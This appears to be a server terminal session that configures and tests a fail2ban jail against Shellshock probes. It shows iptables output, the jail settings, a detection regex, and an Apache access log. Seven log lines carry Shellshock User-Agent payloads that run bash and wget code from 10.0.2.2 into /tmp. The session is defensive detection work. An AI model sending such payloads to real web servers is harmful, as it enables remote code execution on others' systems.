- # iptables -L
- Chain INPUT (policy ACCEPT)
- target prot opt source destination
- fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh
- Chain FORWARD (policy ACCEPT)
- target prot opt source destination
- Chain OUTPUT (policy ACCEPT)
- target prot opt source destination
- Chain fail2ban-ssh (1 references)
- target prot opt source destination
- RETURN all -- anywhere anywhere
- # fail2ban-client status apache-vulnerability-scan
- Status for the jail: apache-vulnerability-scan
- |- filter
- | |- File list: /var/log/apache2/other_vhosts_access.log /var/log/apache2/access.log
- | |- Currently failed: 0
- | `- Total failed: 7
- `- action
- |- Currently banned: 1
- | `- IP list: 10.0.2.2
- `- Total banned: 1
- # cat /etc/fail2ban/jail.local
- [apache-vulnerability-scan]
- enabled = true
- port = http,https
- filter = apache-vulnerability-scan
- logpath = /var/log/apache*/*access.log
- maxretry = 1
- banaction = iptables-multiport
- findtime = 600
- bantime = 600
- # fail2ban-regex -v /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
- Running tests
- =============
- Use failregex file : /etc/fail2ban/filter.d/apache-vulnerability-scan.conf
- Use log file : /var/log/apache2/access.log
- Results
- =======
- Failregex: 7 total
- |- #) [# of hits] regular expression
- | 1) [7] ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$
- | 10.0.2.2 Tue Nov 24 19:49:24 2015
- | 10.0.2.2 Tue Nov 24 19:49:35 2015
- | 10.0.2.2 Tue Nov 24 19:49:36 2015
- | 10.0.2.2 Tue Nov 24 19:49:46 2015
- | 10.0.2.2 Tue Nov 24 19:49:48 2015
- | 10.0.2.2 Tue Nov 24 19:49:49 2015
- | 10.0.2.2 Tue Nov 24 19:49:50 2015
- `-
- Ignoreregex: 0 total
- Date template hits:
- |- [# of hits] date format
- | [7] Day/MONTH/Year:Hour:Minute:Second
- | [0] WEEKDAY MONTH Day Hour:Minute:Second[.subsecond] Year
- | [0] WEEKDAY MONTH Day Hour:Minute:Second Year
- | [0] WEEKDAY MONTH Day Hour:Minute:Second
- | [0] MONTH Day Hour:Minute:Second
- | [0] Year/Month/Day Hour:Minute:Second
- | [0] Day/Month/Year Hour:Minute:Second
- | [0] Day/Month/Year2 Hour:Minute:Second
- | [0] Month/Day/Year:Hour:Minute:Second
- | [0] Year-Month-Day Hour:Minute:Second[,subsecond]
- | [0] Year-Month-Day Hour:Minute:Second
- | [0] Year.Month.Day Hour:Minute:Second
- | [0] Day-MONTH-Year Hour:Minute:Second[.Millisecond]
- | [0] Day-Month-Year Hour:Minute:Second
- | [0] Month-Day-Year Hour:Minute:Second[.Millisecond]
- | [0] TAI64N
- | [0] Epoch
- | [0] ISO 8601
- | [0] Hour:Minute:Second
- | [0] <Month/Day/Year@Hour:Minute:Second>
- | [0] YearMonthDay Hour:Minute:Second
- | [0] Month-Day-Year Hour:Minute:Second
- `-
- Lines: 7 lines, 0 ignored, 7 matched, 0 missed
- # cat /var/log/apache2/access.log
- 10.0.2.2 - - [24/Nov/2015:03:49:24 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:35 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:36 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:46 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:48 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:49 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""
- 10.0.2.2 - - [24/Nov/2015:03:49:50 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\""